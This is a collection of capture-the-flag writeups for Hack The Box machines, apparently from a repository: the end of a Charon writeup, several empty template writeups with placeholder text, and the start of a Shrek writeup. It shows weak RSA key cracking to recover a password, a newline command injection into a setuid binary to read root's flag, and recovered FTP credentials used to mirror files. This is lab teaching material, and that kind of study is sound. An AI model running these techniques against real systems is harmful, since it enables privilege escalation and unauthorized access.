20K -rwxr-xr-x 1 root root 20K Dec 23 2016 yogurt.jpg
www-data@charon:/var/www/html/freeeze/images$ cd /home/
www-data@charon:/home$ ls
decoder
www-data@charon:/home$ cd decoder/
www-data@charon:/home/decoder$ ls -lash
total 40K
4.0K drwxr-xr-x 3 decoder freeeze 4.0K Jun 26 2017 .
4.0K drwxr-xr-x 3 root root 4.0K Jun 23 2017 ..
4.0K -rw-r--r-- 1 decoder freeeze 220 Sep 1 2015 .bash_logout
4.0K -rw-r--r-- 1 decoder freeeze 3.7K Jun 25 2017 .bashrc
4.0K drwx------ 2 decoder freeeze 4.0K Jun 23 2017 .cache
4.0K -rw-r--r-- 1 decoder freeeze 654 Jun 25 2017 .profile
4.0K -rw------- 1 decoder freeeze 601 Jun 26 2017 .viminfo
4.0K -rw-r--r-- 1 decoder freeeze 138 Jun 23 2017 decoder.pub
4.0K -rw-r--r-- 1 decoder freeeze 32 Jun 23 2017 pass.crypt
4.0K -r-------- 1 decoder freeeze 33 Jun 23 2017 user.txt
www-data@charon:/home/decoder$ cat user.txt
cat: user.txt: Permission denied
www-data@charon:/home/decoder$ file decoder.pub && file pass.crypt
decoder.pub: ASCII text
pass.crypt: data
www-data@charon:/home/decoder$
After poking around a bit we found out that we (www-data) can't read the user flag, but we do have access to decoder.pub and pass.crypt:
www-data@charon:/home/decoder$ cat decoder.pub
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhALxHhYGPVMYmx3vzJbPPAEa10NETXrV3
mI9wJizmFJhrAgMBAAE=
-----END PUBLIC KEY-----
www-data@charon:/home/decoder$ cat pass.crypt
2OSb"eWgTo7I
So let's save both locally (it's easy since they are small files; you can just copy-paste them into nano). Note that pass.crypt is binary, so copy-pasting through a terminal can drop non-printable bytes; running base64 on it on the box and decoding locally avoids that:
[ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
→ ls
nothing.php.gif
[ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
→ wget http://10.10.10.31:9999/decoder.pub
--2020-08-13 15:50:36-- http://10.10.10.31:9999/decoder.pub
Connecting to 10.10.10.31:9999... ^C
[ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
→ nano decoder.pub
[ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
→ nano pass.crypt
[ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
→ ls -lash
total 24K
4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 13 15:52 .
4.0K drwxr-xr-x 4 nothing nothing 4.0K Aug 13 14:34 ..
4.0K -rw-r--r-- 1 nothing nothing 138 Aug 13 15:51 decoder.pub
4.0K -rw-r--r-- 1 nothing nothing 83 Aug 13 15:19 nothing.php.gif
4.0K -rw-r--r-- 1 nothing nothing 1.0K Aug 13 15:18 .nothing.php.gif.swp
4.0K -rw-r--r-- 1 nothing nothing 13 Aug 13 15:52 pass.crypt
Here we'll crack the weak RSA key (the modulus is only 256 bits, far too small to resist factoring) using RsaCtfTool:
[ 10.10.14.8/23 ] [ /dev/pts/18 ] [~/_HTB/Charon]
→ /opt/RsaCtfTool/RsaCtfTool.py --publickey decoder.pub --uncipher pass.crypt
[+] Clear text : nevermindthebollocks
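What RsaCtfTool did here, as an added example that is not the tool's own code: parse decoder.pub (the PEM from the box, copied from above) to show the modulus really is 256 bits with e = 65537, then run the recovery itself, factor n, derive d, and decrypt a raw RSA block, on a toy key. The toy primes are an assumption (the box's p and q are never shown on the page) chosen small enough for plain Pollard rho; a real 256-bit modulus needs ECM/NFS or a factordb lookup, which is what RsaCtfTool tries. The raw (unpadded) decryption matches the 32-byte pass.crypt, which is exactly one block for a 256-bit n.

```python
import base64
from math import gcd

# The 256-bit key found in /home/decoder (copied from the writeup above).
DECODER_PUB = """-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhALxHhYGPVMYmx3vzJbPPAEa10NETXrV3
mI9wJizmFJhrAgMBAAE=
-----END PUBLIC KEY-----"""


def _tlv(buf, pos):
    """Read one DER tag/length/value triple; returns (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_public_key(pem: str):
    """Pull (n, e) out of a PEM SubjectPublicKeyInfo without any crypto library."""
    body = "".join(l for l in pem.strip().splitlines() if not l.startswith("-----"))
    der = base64.b64decode(body)
    _, spki, _ = _tlv(der, 0)              # SEQUENCE { AlgorithmIdentifier, BIT STRING }
    _, _alg, pos = _tlv(spki, 0)
    _, bitstr, _ = _tlv(spki, pos)
    _, rsapub, _ = _tlv(bitstr[1:], 0)     # skip the unused-bits byte; RSAPublicKey SEQUENCE
    _, n_bytes, pos = _tlv(rsapub, 0)
    _, e_bytes, _ = _tlv(rsapub, pos)
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def pollard_rho(n: int) -> int:
    """Return a non-trivial factor of n.  Fine for the toy key below; a real
    256-bit modulus needs ECM/NFS or a factordb lookup (what RsaCtfTool tries)."""
    if n % 2 == 0:
        return 2
    for c in range(1, 50):
        f = lambda x: (x * x + c) % n
        x = y = 2
        d = 1
        while d == 1:
            x, y = f(x), f(f(y))
            d = gcd(abs(x - y), n)
        if d != n:
            return d
    raise ValueError("no factor found")


def private_exponent(e: int, p: int, q: int) -> int:
    return pow(e, -1, (p - 1) * (q - 1))


def rsa_raw(x: int, k: int, n: int) -> int:
    """Textbook RSA: pass.crypt is one 32-byte raw block, no padding."""
    return pow(x, k, n)


def recover_from_weak_key(n: int, e: int, ciphertext: bytes) -> bytes:
    """The whole --uncipher path: factor n, derive d, decrypt the raw block."""
    p = pollard_rho(n)
    q = n // p
    m = rsa_raw(int.from_bytes(ciphertext, "big"), private_exponent(e, p, q), n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


# Toy key: two known primes small enough for Pollard rho (assumption: these are
# not the box's primes, which the page never shows).
DEMO_P, DEMO_Q, DEMO_E = 2147483647, 4294967311, 65537


def demo_round_trip(message: bytes = b"secret") -> bytes:
    n = DEMO_P * DEMO_Q
    c = rsa_raw(int.from_bytes(message, "big"), DEMO_E, n)
    ct = c.to_bytes((n.bit_length() + 7) // 8, "big")
    return recover_from_weak_key(n, DEMO_E, ct)


if __name__ == "__main__":
    n, e = parse_rsa_public_key(DECODER_PUB)
    print(f"decoder.pub: n is {n.bit_length()} bits, e = {e}")   # far below the 2048-bit floor
    print("toy key round trip:", demo_round_trip())
```

The key-size check alone is worth keeping in your toolbox: any RSA public key whose modulus is well under 1024 bits is a factoring target before it is anything else.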
And we have decoder's password! So let's log in via SSH as the decoder user:
[ 10.10.14.8/23 ] [ /dev/pts/18 ] [~/_HTB/Charon]
→ ssh decoder@10.10.10.31
The authenticity of host '10.10.10.31 (10.10.10.31)' can't be established.
ECDSA key fingerprint is SHA256:V1uA1jbcL+1r8UE/foqVjb2u9rSiGTP6EB1Q374Zp9o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.31' (ECDSA) to the list of known hosts.
decoder@10.10.10.31's password:
Permission denied, please try again.
decoder@10.10.10.31's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
34 packages can be updated.
23 updates are security updates.
$ id
uid=1001(decoder) gid=1001(freeeze) groups=1001(freeeze)
$ cat user.txt
0fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! We have been able to print out the user flag.
## **Part 3 : Getting Root Access**
To be able to read the root flag we first need to escalate privileges, so we look for files with the SUID bit set and find a binary called supershell in /usr/local/bin:
$ find / -perm -4000 2>/dev/null
**/usr/local/bin/supershell**
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/newuidmap
/bin/ntfs-3g
/bin/ping6
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping
/bin/su
When we run this binary we find that it hands its argument to sh, so a newline inside the argument lets us run a second command of our own. We use that to read root.txt: the first line fails ("/bin/ls$/: not found") and the second line executes as root:
$ supershell "/bin/ls$/
> cat /root/root.txt
> "
Supershell (very beta)
++[/bin/ls$/
cat /root/root.txt
]
sh: 1: /bin/ls$/: not found
c5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! We have been able to read the root flag.
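The pattern behind the supershell trick, as an added example (not the binary's own source, which the page never shows): a wrapper that validates only the first token of its argument and then runs the whole string through `sh -c`. The allow-list check is an assumption; the injection works against any check that only looks at the first line or token. `echo` stands in for cat /root/root.txt so the block runs anywhere. The fixed variant tokenises with shlex, allow-lists argv[0] and execs without a shell, so newlines, `;` and `$(...)` are plain argument characters rather than syntax.

```python
import shlex
import subprocess

# Assumed allow-list; the real binary's check is not on the page.
ALLOWED_BINARIES = {"/bin/ls", "/bin/cat", "/bin/id"}


def supershell_vulnerable(cmdline: str):
    """Checks only the first whitespace-delimited token, then hands the whole
    string to the shell, so a newline (or ';') smuggles in a second command.
    Returns (returncode, stdout, stderr)."""
    tokens = cmdline.split()
    if not tokens or not tokens[0].startswith("/bin/"):
        return 1, "", "Supershell: only /bin/* commands are allowed\n"
    proc = subprocess.run(["sh", "-c", cmdline], capture_output=True, text=True)
    return proc.returncode, proc.stdout, proc.stderr


def supershell_fixed(cmdline: str):
    """Tokenise with shlex, allow-list argv[0], and exec without a shell.  A
    newline is just whitespace to shlex, so the second 'command' becomes
    arguments to the first and never reaches a shell parser."""
    argv = shlex.split(cmdline)
    if not argv or argv[0] not in ALLOWED_BINARIES:
        raise PermissionError(f"refusing to run {argv[:1]}")
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.returncode, proc.stdout, proc.stderr


# The writeup's trick: a bogus first line that satisfies the check, then the
# command we actually want on a second line (echo stands in for cat root.txt).
INJECTION = "/bin/ls$/\necho injected"


if __name__ == "__main__":
    rc, out, err = supershell_vulnerable(INJECTION)
    print("vulnerable ->", rc, out.strip(), "|", err.strip())
    try:
        supershell_fixed(INJECTION)
    except PermissionError as exc:
        print("fixed ->", exc)
```

Note that the shell's own error for the first line is the same one seen on the box, and that the exit status is that of the last command, so a caller checking only the return code would see success.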
## **Conclusion**
Here we can see the progress graph :
![](img/3_graph.png)

Hard/30.md Normal file
# ForwardSlash Writeup
![](img/30.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/31.md Normal file
# Quick Writeup
![](img/31.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/32.md Normal file
# Travel Writeup
![](img/32.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/33.md Normal file
# Blackfield Writeup
![](img/33.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/34.md Normal file
# Intense Writeup
![](img/34.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/35.md Normal file
# Unbalanced Writeup
![](img/35.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/36.md Normal file
# Feline Writeup
![](img/36.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/37.md Normal file
# Compromised Writeup
![](img/37.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/38.md Normal file
# Reel2 Writeup
![](img/38.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/39.md Normal file
# Sharp Writeup
![](img/39.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/4.md Normal file
# Shrek Writeup
![](img/4.png)
## Introduction :
Shrek is a hard linux box released back in August 2017.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.47 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Discovered open port 80/tcp on 10.10.10.47
Discovered open port 22/tcp on 10.10.10.47
Discovered open port 21/tcp on 10.10.10.47
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
→ nmap -sCV -p21,22,80 10.10.10.47
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 19:04 BST
Nmap scan report for 10.10.10.47
Host is up (0.029s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 2d:a7:95:95:5d:dd:75:ca:bc:de:36:2c:33:f6:47:ef (RSA)
| 256 b5:1f:0b:9f:83:b3:6c:3b:6b:8b:71:f4:ee:56:a8:83 (ECDSA)
|_ 256 1f:13:b7:36:8d:cd:46:6c:29:6d:be:e4:ab:9c:24:5b (ED25519)
80/tcp open http Apache httpd 2.4.27 ((Unix))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Unix)
|_http-title: Home
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.10 seconds
## **Part 2 : Getting User Access**
Our nmap scan says that port 80 is open, so let's investigate it:
![](prg/4/001.png)
[ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
→ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x "xml,php,html,js,txt" -u http://10.10.10.47/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.47/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,xml,php,html,js
[+] Timeout: 10s
===============================================================
2020/08/10 19:08:04 Starting gobuster
===============================================================
/images (Status: 301)
/uploads (Status: 301)
/upload.php (Status: 200)
/upload.html (Status: 200)
/About.html (Status: 200)
/Index.html (Status: 200)
/Gallery.html (Status: 200)
/Sitemap.html (Status: 200)
/memes (Status: 301)
/shrek (Status: 301)
So the interesting pages here are /upload.html and /upload.php:
![](prg/4/002.png)
When we upload any file there we get redirected to /upload.php:
![](prg/4/003.png)
Looking at /uploads we get a directory listing which contains a bunch of malware, but the timestamps show us that it's probably not going to help us:
![](prg/4/004.png)
The interesting file to look at here is secret_ultimate.php:
![](prg/4/005.png)
However we don't get to see the PHP comments, so we hit CTRL+U to view the source code:
![](prg/4/006.png)
Which hints us towards the /secret_area_51/ directory:
![](prg/4/007.png)
So apparently we get an mp3 containing some music, but the trick here was to inspect the end of the song, because there is some extra static at the end after the music fades out:
![](prg/4/009.png)
The trick here was to inspect this static in a spectrogram:
![](prg/4/010.png)
Here we see something interesting at the top of the stereo channels. Under the spectrogram settings we increase the max frequency tenfold, which reveals the following message:
![](prg/4/011.png) ![](prg/4/012.png)
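The reason the message only appears after raising the spectrogram's maximum frequency is that it was painted into a band well above the music, where a default view clips it. The block below is an added example (not from the writeup) that finds such a band programmatically instead of by eye: it synthesises a constructed stand-in for the mp3 (half a second of a 440 Hz "music" tone followed by a quiet 18 kHz burst, written and read back as a 16-bit WAV), then measures per-frame energy at a musical frequency and at 18 kHz with the Goertzel algorithm so no numpy is needed. The frame length and probe frequencies are assumptions chosen so both tones fall on exact bins; on a real file you would sweep the probe across the band above ~16 kHz.

```python
import io
import math
import struct
import wave

RATE = 44100
FRAME = 2205   # 50 ms analysis window; 440 Hz and 18 kHz both land on exact bins


def tone(freq_hz, seconds, amplitude, rate=RATE):
    return [amplitude * math.sin(2 * math.pi * freq_hz * i / rate) for i in range(round(seconds * rate))]


def build_demo_audio():
    """Constructed stand-in for the mp3: 0.5 s of 'music' at 440 Hz followed by
    0.2 s of quiet 18 kHz 'static', the band where a message would be painted."""
    return tone(440, 0.5, 0.5) + tone(18000, 0.2, 0.05)


def write_wav(samples, rate=RATE) -> bytes:
    """Encode float samples in [-1, 1] as a mono 16-bit PCM WAV held in memory."""
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(b"".join(struct.pack("<h", int(max(-1.0, min(1.0, s)) * 32767)) for s in samples))
    return buf.getvalue()


def read_wav(data: bytes):
    with wave.open(io.BytesIO(data), "rb") as w:
        raw = w.readframes(w.getnframes())
    return [v / 32767 for (v,) in struct.iter_unpack("<h", raw)]


def goertzel_amplitude(frame, freq_hz, rate=RATE):
    """Amplitude of one frequency in a frame (Goertzel algorithm, pure Python).
    For a tone sitting exactly on bin k this returns its peak amplitude."""
    n = len(frame)
    k = round(n * freq_hz / rate)
    coeff = 2 * math.cos(2 * math.pi * k / n)
    s_prev = s_prev2 = 0.0
    for x in frame:
        s = x + coeff * s_prev - s_prev2
        s_prev2, s_prev = s_prev, s
    power = s_prev * s_prev + s_prev2 * s_prev2 - coeff * s_prev * s_prev2
    return 2 * math.sqrt(max(power, 0.0)) / n


def scan(samples, probe_hz=(440, 18000), frame=FRAME):
    """Per-frame amplitude at each probe frequency: [(frame_index, amp@440, amp@18k), ...]."""
    report = []
    for i in range(len(samples) // frame):
        chunk = samples[i * frame:(i + 1) * frame]
        report.append((i, *[goertzel_amplitude(chunk, f) for f in probe_hz]))
    return report


def hidden_frames(report, threshold=0.01):
    """Frames with energy above the musical band, i.e. the ones that only show
    up once the spectrogram's max frequency is raised."""
    return [i for i, _low, high in report if high > threshold]


if __name__ == "__main__":
    report = scan(read_wav(write_wav(build_demo_audio())))
    for i, a440, a18k in report:
        print(f"frame {i:2d}  440Hz={a440:.3f}  18kHz={a18k:.3f}")
    print("frames carrying high-frequency content:", hidden_frames(report))
```

On the constructed input the first ten frames show the 440 Hz tone and nothing at 18 kHz, and the last four show the reverse, which is the same "quiet tail that is not actually empty" signature the spectrogram exposed on the box.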
And it looks like we got FTP credentials! **donkey:d0nk3y1337!** So we log in via FTP:
[ 10.10.14.8/23 ] [ /dev/pts/5 ] [~/_HTB/Shrek]
→ ftp 10.10.10.47
Connected to 10.10.10.47.
220 (vsFTPd 3.0.3)
Name (10.10.10.47:nothing): donkey
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 9216 Aug 14 09:01 0a935efe212d455eaba901f743e76a1f.txt
-rw-r--r-- 1 0 0 7168 Aug 14 09:01 129a5d725798449cbe35c14226c21ec8.txt
-rw-r--r-- 1 0 0 11264 Aug 14 09:01 173224a539f74d5bbd78bd097884a445.txt
-rw-r--r-- 1 0 0 15360 Aug 14 09:01 1cf72311c8394b85bee71378452a0627.txt
-rw-r--r-- 1 0 0 3072 Aug 14 09:01 2d0b3a4e22dc4043976529e9e450839d.txt
-rw-r--r-- 1 0 0 3072 Aug 14 09:01 2fdfec98b6f54a4bb2c24492804ed23e.txt
-rw-r--r-- 1 0 0 15360 Aug 14 09:01 3416a6f48fb7407e8bfa58ee7869b4c9.txt
-rw-r--r-- 1 0 0 15360 Aug 14 09:01 35ed54b85fda4c728e28d043ceff403f.txt
-rw-r--r-- 1 0 0 7168 Aug 14 09:01 3896633fd0f44d5789df5366050ecc4f.txt
-rw-r--r-- 1 0 0 14336 Aug 14 09:01 40c2e657bcc54c78be1986e9bb45886a.txt
-rw-r--r-- 1 0 0 15390 Aug 14 09:01 4328526e95f2406d8af2428b92a3afa8.txt
-rw-r--r-- 1 0 0 3072 Aug 14 09:01 549fe668212042acbcc96af1758141a4.txt
-rw-r--r-- 1 0 0 6144 Aug 14 09:01 629ac3a5efe24adaa7b5172f8bda44ca.txt
-rw-r--r-- 1 0 0 8192 Aug 14 09:01 631385a5a1ce4e46a206f0f0fbdc0808.txt
-rw-r--r-- 1 0 0 6144 Aug 14 09:01 68b211ee5513471e8b7de17661d18a9d.txt
-rw-r--r-- 1 0 0 13312 Aug 14 09:01 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
-rw-r--r-- 1 0 0 15360 Aug 14 09:01 79947ab62f1a4b959b68ada2b7849ff2.txt
-rw-r--r-- 1 0 0 5120 Aug 14 09:01 7ef381dce26a488493df64b67f3db3cf.txt
-rw-r--r-- 1 0 0 5120 Aug 14 09:01 84644e19171e425d8ac6e6e7a1398c46.txt
-rw-r--r-- 1 0 0 15360 Aug 14 09:01 9c11f948f169414cb4d3cfb607850e58.txt
-rw-r--r-- 1 0 0 6144 Aug 14 09:01 9de89e29bdb64a5eb69f1a8f344cd85a.txt
-rw-r--r-- 1 0 0 5120 Aug 14 09:01 a1127bfd922e43f0b0007b147c26e11e.txt
-rw-r--r-- 1 0 0 7168 Aug 14 09:01 a381c21f0e874439a1a634a940eaf4a9.txt
-rw-r--r-- 1 0 0 7168 Aug 14 09:01 b26e893ae4b84ca28872fc519c3803fc.txt
-rw-r--r-- 1 0 0 8192 Aug 14 09:01 b2edd39d22674696a56a7939af2ff917.txt
-rw-r--r-- 1 0 0 4096 Aug 14 09:01 bf22aa78874249a4a855995884f1daeb.txt
-rw-r--r-- 1 0 0 7598 Aug 14 09:01 d25fcf2994e14ebf990cf5b9f0b98691.txt
-rw-r--r-- 1 0 0 12288 Aug 14 09:01 dddedeb00dee439a86f7ac4c583ec700.txt
-rw-r--r-- 1 0 0 9216 Aug 14 09:01 e415d037bfb74c5fa6d0521ff662de8d.txt
-rw-r--r-- 1 0 0 15360 Aug 14 09:01 e5598789c60b45cf9f821e130af3b70e.txt
-rw-r--r-- 1 0 0 6144 Aug 14 09:01 f274007acbbb431185bc1fb3a1a8c5c0.txt
-rw-r--r-- 1 0 0 1766 Aug 16 2017 key
We retrieve "key", which is an encrypted private SSH key:
![](prg/4/013.png)
Rather than fetching every file from the FTP server one by one, we mirror it with wget:
[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek]
→ wget -r --user="donkey" --password="d0nk3y1337!" ftp://10.10.10.47/
--2020-08-14 12:25:21-- ftp://10.10.10.47/
=> 10.10.10.47/.listing
Connecting to 10.10.10.47:21... connected.
Logging in as donkey ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> PASV ... done. ==> LIST ... done.
[...]
[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek]
→ ls -lashR
.:
total 3.4M
